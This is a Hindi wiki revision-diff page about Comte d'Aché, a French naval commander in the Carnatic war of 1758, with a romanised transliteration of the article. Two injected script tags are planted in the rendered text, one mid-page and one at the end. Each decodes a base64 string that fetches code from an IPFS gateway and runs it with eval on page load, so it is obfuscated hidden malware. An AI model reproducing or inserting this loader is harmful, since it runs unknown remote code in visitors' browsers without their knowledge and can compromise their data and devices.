Difference between revisions of "काउंत डी एक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*काउंत डी एक [[फ़्राँस]] का एक नौसैनिक अधिकारी था।  
+
'''काउंत डी एक''' [[फ़्राँस]] का एक नौसैनिक अधिकारी था।  
 
*काउंत डी एक फ़्राँस के उस जहाजी बेड़े का कमाण्डर था, जिस पर सवार होकर [[कर्नाटक]] में [[अंग्रेज़|अंग्रेज़ों]] और [[फ़्राँसीसी|फ़्राँसीसियों]] के बीच हो रहे युद्ध के आख़िरी चरण में 1758 ई. में काउंत दि लाली और फ़्राँसीसी सेना [[भारत]] आई थी।  
 
*काउंत डी एक फ़्राँस के उस जहाजी बेड़े का कमाण्डर था, जिस पर सवार होकर [[कर्नाटक]] में [[अंग्रेज़|अंग्रेज़ों]] और [[फ़्राँसीसी|फ़्राँसीसियों]] के बीच हो रहे युद्ध के आख़िरी चरण में 1758 ई. में काउंत दि लाली और फ़्राँसीसी सेना [[भारत]] आई थी।  
 
*प्रारम्भ में काउंत डी एक को भारी सफलता प्राप्त हुई और उसने पीकाक के नेतृत्व में [[ब्रिटिश साम्राज्य|ब्रिटिश]] बेड़े को [[मद्रास]] के समुद्र तट से दूर भागने को मजबूर कर दिया। किन्तु पीकाक का बेड़ा शीघ्र ही लौट आया और उसने [[कारीकल]] से कुछ दूरी पर काउंत डी एक को 1758 में परास्त कर दिया।  
 
*प्रारम्भ में काउंत डी एक को भारी सफलता प्राप्त हुई और उसने पीकाक के नेतृत्व में [[ब्रिटिश साम्राज्य|ब्रिटिश]] बेड़े को [[मद्रास]] के समुद्र तट से दूर भागने को मजबूर कर दिया। किन्तु पीकाक का बेड़ा शीघ्र ही लौट आया और उसने [[कारीकल]] से कुछ दूरी पर काउंत डी एक को 1758 में परास्त कर दिया।  
*काउंत डी एक की इस पराजय से चौथे कर्नाटक युद्ध में फ़्राँसीसियों को बहुत नुकसान पहुँचा और उसे फ़्राँस वापस लौट जाना पड़ा।
+
*काउंत डी एक की इस पराजय से चौथे कर्नाटक युद्ध में फ़्राँसीसियों को बहुत नुकसान पहुँचा और उसे फ़्राँस वापस लौट जाना पड़ा।<ref>पुस्तक भारतीय इतिहास कोश, पृष्ठ संख्या-182</ref>
{{प्रचार}}
+
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
पुस्तक भारतीय इतिहास कोश, पृष्ठ संख्या-182
+
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
Line 19: Line 12:
 
[[Category:अंग्रेज़ी_शासन]]
 
[[Category:अंग्रेज़ी_शासन]]
 
[[Category:इतिहास_कोश]]
 
[[Category:इतिहास_कोश]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:54, 6 May 2012

kauant di ek fraans ka ek nausainik adhikari tha.

  • kauant di ek fraans ke us jahaji be de ka kamandar tha, jis par savar hokar karnatak mean aangrezoan aur fraansisiyoan ke bich ho rahe yuddh ke akhiri charan mean 1758 ee. mean kauant di lali aur fraansisi sena bharat aee thi.
  • prarambh mean kauant di ek ko bhari saphalata prapt huee aur usane pikak ke netritv mean british be de ko madras ke samudr tat se door bhagane ko majaboor kar diya. kintu pikak ka be da shighr hi laut aya aur usane karikal se kuchh doori par kauant di ek ko 1758 mean parast kar diya.
  • kauant di ek ki is parajay se chauthe karnatak yuddh mean fraansisiyoan ko bahut nukasan pahuancha aur use fraans vapas laut jana p da.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. pustak bharatiy itihas kosh, prishth sankhya-182

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>